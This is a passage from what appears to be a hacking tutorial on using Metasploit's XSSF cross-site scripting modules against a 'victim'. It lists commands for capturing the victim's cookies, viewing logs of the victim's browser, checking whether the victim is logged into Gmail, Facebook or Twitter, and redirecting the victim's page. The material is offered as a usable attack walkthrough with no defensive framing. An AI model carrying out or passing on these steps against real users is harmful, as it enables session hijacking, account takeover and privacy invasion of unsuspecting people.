Now use the following command In metasploit to capture victim’s cookies
“use auxiliary/xssf/public/misc/cookie”
Once you get msf auxiliary prompt run the following command
“xssf_logs 1”
Now run the command “xssf_log 2” to store the logs where 2 is the Session ID
Now run “xssf_urls” command to get all xssf URL commands
Now run “http://localhost:8889/gui.html?guipage=main” to see the logs of victim’s PC.
You can see the logs in the last section as shown in the following image.
The following is the Alert message on Victim’s Screen
You can see the logs in the last section as shown in the following image.
Now refresh your log browser and see the series of logs as shown in the following image.
Now run “use auxiliary/xssf/public/misc/check_connected” to check if victim has opened any Social networking sites (eg . gmail, facebook , twitter)
Finally run “use auxiliary/xssf/public/misc/redirect to redirect the victim’s page”
Refresh the log browser and see the logs getting updated as shown in below image.
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